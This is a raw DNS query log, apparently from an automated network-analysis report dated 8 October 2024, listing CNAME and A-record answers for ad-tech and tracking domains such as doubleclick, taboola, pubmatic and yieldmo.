                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399698019 CEST1.1.1.1192.168.2.40x487No error (0)dsp.360yield.comice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.399698019 CEST1.1.1.1192.168.2.40x487No error (0)ice.360yield.comeuw-ice.360yield.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.487250090 CEST1.1.1.1192.168.2.40xcb66No error (0)core.iprom.net195.5.165.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.520116091 CEST1.1.1.1192.168.2.40xb19aNo error (0)cr.frontend.weborama.fr34.111.129.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.520131111 CEST1.1.1.1192.168.2.40xfed0No error (0)mwzeom.zeotap.com104.22.50.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.520131111 CEST1.1.1.1192.168.2.40xfed0No error (0)mwzeom.zeotap.com172.67.40.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.520131111 CEST1.1.1.1192.168.2.40xfed0No error (0)mwzeom.zeotap.com104.22.51.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.521034002 CEST1.1.1.1192.168.2.40x75a1No error (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.523650885 CEST1.1.1.1192.168.2.40x62dbNo error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.523650885 CEST1.1.1.1192.168.2.40x62dbNo error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.523650885 CEST1.1.1.1192.168.2.40x62dbNo error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.525897026 CEST1.1.1.1192.168.2.40x9d05No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.627285957 CEST1.1.1.1192.168.2.40xed93No error (0)bttrack.com192.132.33.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.627285957 CEST1.1.1.1192.168.2.40xed93No error (0)bttrack.com192.132.33.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.627285957 CEST1.1.1.1192.168.2.40xed93No error (0)bttrack.com192.132.33.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.713771105 CEST1.1.1.1192.168.2.40x5457No error (0)rtb0.doubleverify.combs-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.713771105 CEST1.1.1.1192.168.2.40x5457No error (0)rtbc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:48.714725018 CEST1.1.1.1192.168.2.40xe17eNo error (0)rtb0.doubleverify.combs-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815577984 CEST1.1.1.1192.168.2.40x24deNo error (0)googleads.g.doubleclick.net142.250.185.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815592051 CEST1.1.1.1192.168.2.40xf502No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815603971 CEST1.1.1.1192.168.2.40xee22No error (0)s0.2mdn.net172.217.18.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815810919 CEST1.1.1.1192.168.2.40x3680No error (0)cdn.doubleverify.comcdn.doubleverify.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815849066 CEST1.1.1.1192.168.2.40xb42bNo error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815849066 CEST1.1.1.1192.168.2.40xb42bNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815849066 CEST1.1.1.1192.168.2.40xb42bNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815849066 CEST1.1.1.1192.168.2.40xb42bNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.815849066 CEST1.1.1.1192.168.2.40xb42bNo error (0)dualstack.tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.816287041 CEST1.1.1.1192.168.2.40xfee6No error (0)trc.taboola.comdualstack.tls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:49.816297054 CEST1.1.1.1192.168.2.40xfa0eNo error (0)cdn.doubleverify.comcdn.doubleverify.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.054445982 CEST1.1.1.1192.168.2.40x6aecNo error (0)s.seedtag.com34.149.50.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.054456949 CEST1.1.1.1192.168.2.40xc7d2No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.054846048 CEST1.1.1.1192.168.2.40x7d35No error (0)match.sharethrough.commatch-eu-central-1-ecs.sharethrough.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.054846048 CEST1.1.1.1192.168.2.40x7d35No error (0)match-eu-central-1-ecs.sharethrough.com18.184.119.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.230084896 CEST1.1.1.1192.168.2.40x8c5No error (0)cms.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.230084896 CEST1.1.1.1192.168.2.40x8c5No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.230084896 CEST1.1.1.1192.168.2.40x8c5No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.232363939 CEST1.1.1.1192.168.2.40xf248No error (0)cms.analytics.yahoo.comprod.ups-ats.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.232363939 CEST1.1.1.1192.168.2.40xf248No error (0)prod.ups-ats.aolp-ds-prd.aws.oath.cloudprod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.232363939 CEST1.1.1.1192.168.2.40xf248No error (0)prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloudats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.232363939 CEST1.1.1.1192.168.2.40xf248No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.71.149.231A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:50.232363939 CEST1.1.1.1192.168.2.40xf248No error (0)ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud3.75.62.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.576678991 CEST1.1.1.1192.168.2.40xcfc4No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.576693058 CEST1.1.1.1192.168.2.40xd946No error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.576704025 CEST1.1.1.1192.168.2.40x49c4No error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.576704025 CEST1.1.1.1192.168.2.40x49c4No error (0)tpsc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.581808090 CEST1.1.1.1192.168.2.40x6b5aNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.581826925 CEST1.1.1.1192.168.2.40xf5daNo error (0)ad.doubleclick.net142.250.184.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.582344055 CEST1.1.1.1192.168.2.40x6b77No error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.583378077 CEST1.1.1.1192.168.2.40xe600No error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.583378077 CEST1.1.1.1192.168.2.40xe600No error (0)tpsc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.583853006 CEST1.1.1.1192.168.2.40xba9aNo error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.584252119 CEST1.1.1.1192.168.2.40x1aabNo error (0)tps.doubleverify.comtps-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.584299088 CEST1.1.1.1192.168.2.40x2adeNo error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.584954977 CEST1.1.1.1192.168.2.40x255cNo error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.597691059 CEST1.1.1.1192.168.2.40x6f19No error (0)ad.doubleclick.net142.250.181.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.597707987 CEST1.1.1.1192.168.2.40xcc2eNo error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.600018024 CEST1.1.1.1192.168.2.40x1db2No error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.600486994 CEST1.1.1.1192.168.2.40xd718No error (0)c.evidon.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.968806028 CEST1.1.1.1192.168.2.40x43f7No error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.968806028 CEST1.1.1.1192.168.2.40x43f7No error (0)noa-atsv2.media.g03.yahoodns.net188.125.72.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:51.970058918 CEST1.1.1.1192.168.2.40x8eccNo error (0)noa.yahoo.comnoa-atsv2.media.g03.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.033020020 CEST1.1.1.1192.168.2.40x2879No error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.033020020 CEST1.1.1.1192.168.2.40x2879No error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.033020020 CEST1.1.1.1192.168.2.40x2879No error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-pm.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.171.65.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.212.171.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com34.248.250.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com34.241.193.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.214.184.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.31.186.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.194.236.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.038532972 CEST1.1.1.1192.168.2.40x9297No error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.212.147.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com52.57.181.208A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com35.158.183.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com52.28.29.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com3.120.11.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com18.195.28.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.337511063 CEST1.1.1.1192.168.2.40xefa7No error (0)exchange.mediavine.com3.121.28.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.466811895 CEST1.1.1.1192.168.2.40x4a72No error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.466811895 CEST1.1.1.1192.168.2.40x4a72No error (0)image4-v2.pubmnet.comspug-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.466811895 CEST1.1.1.1192.168.2.40x4a72No error (0)spug-lhrc.pubmnet.com185.64.190.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.467677116 CEST1.1.1.1192.168.2.40xf082No error (0)simage4.pubmatic.comimage4-v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.467677116 CEST1.1.1.1192.168.2.40xf082No error (0)image4-v2.pubmnet.comspug-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.506211042 CEST1.1.1.1192.168.2.40xb508No error (0)pubmatic-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.507162094 CEST1.1.1.1192.168.2.40x19b2No error (0)pubmatic-match.dotomi.combfp.global.dual.dotomi.weighted.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.662209988 CEST1.1.1.1192.168.2.40x5d91No error (0)match.adsby.bidtheatre.com134.122.57.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.662209988 CEST1.1.1.1192.168.2.40x5d91No error (0)match.adsby.bidtheatre.com188.166.17.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.662209988 CEST1.1.1.1192.168.2.40x5d91No error (0)match.adsby.bidtheatre.com64.227.64.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.836134911 CEST1.1.1.1192.168.2.40xd832No error (0)s2s.t13.io34.107.140.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.883441925 CEST1.1.1.1192.168.2.40x1346No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.883441925 CEST1.1.1.1192.168.2.40x1346No error (0)sync.1rx.io46.228.174.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.885972023 CEST1.1.1.1192.168.2.40xdf48No error (0)sync.targeting.unrulymedia.comsync.1rx.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.975399971 CEST1.1.1.1192.168.2.40x2103No error (0)um.simpli.fi35.204.74.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.975399971 CEST1.1.1.1192.168.2.40x2103No error (0)um.simpli.fi34.91.62.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.975399971 CEST1.1.1.1192.168.2.40x2103No error (0)um.simpli.fi35.204.158.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net54.76.113.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net52.48.114.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net52.214.114.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net54.72.167.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net54.229.139.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net52.30.186.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net99.80.212.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.980613947 CEST1.1.1.1192.168.2.40x301dNo error (0)sync.crwdcntrl.net63.32.25.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.984652042 CEST1.1.1.1192.168.2.40x8de2No error (0)rtb0.doubleverify.combs-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.984652042 CEST1.1.1.1192.168.2.40x8de2No error (0)rtbc-ew1.doubleverify.com130.211.44.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.985260963 CEST1.1.1.1192.168.2.40x43aNo error (0)rtb0.doubleverify.combs-geo.dvgtm.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.985714912 CEST1.1.1.1192.168.2.40xef40No error (0)c.betrad.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.987555981 CEST1.1.1.1192.168.2.40x1b58No error (0)c.betrad.comnewwildcard.evidon.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.989147902 CEST1.1.1.1192.168.2.40x640No error (0)ad.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:52.991137028 CEST1.1.1.1192.168.2.40x327dNo error (0)ad.doubleclick.net142.250.185.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.018774986 CEST1.1.1.1192.168.2.40x430dNo error (0)mwzeom.zeotap.com104.22.50.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.018774986 CEST1.1.1.1192.168.2.40x430dNo error (0)mwzeom.zeotap.com172.67.40.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.018774986 CEST1.1.1.1192.168.2.40x430dNo error (0)mwzeom.zeotap.com104.22.51.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.019402027 CEST1.1.1.1192.168.2.40x6a11No error (0)mwzeom.zeotap.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.021292925 CEST1.1.1.1192.168.2.40x4789No error (0)d.agkn.comdata.agkn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.021292925 CEST1.1.1.1192.168.2.40x4789No error (0)data.agkn.comtag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.021292925 CEST1.1.1.1192.168.2.40x4789No error (0)tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com3.67.231.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.021292925 CEST1.1.1.1192.168.2.40x4789No error (0)tag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.com3.122.38.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.023967028 CEST1.1.1.1192.168.2.40x523eNo error (0)d.agkn.comdata.agkn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.023967028 CEST1.1.1.1192.168.2.40x523eNo error (0)data.agkn.comtag-terraform-elb-1705565586.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io63.33.84.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 21:14:53.224632978 CEST1.1.1.1192.168.2.40x2f09No error (0)cs.yellowblue.io54.76.188.79A (IP address)IN (0x0001)false
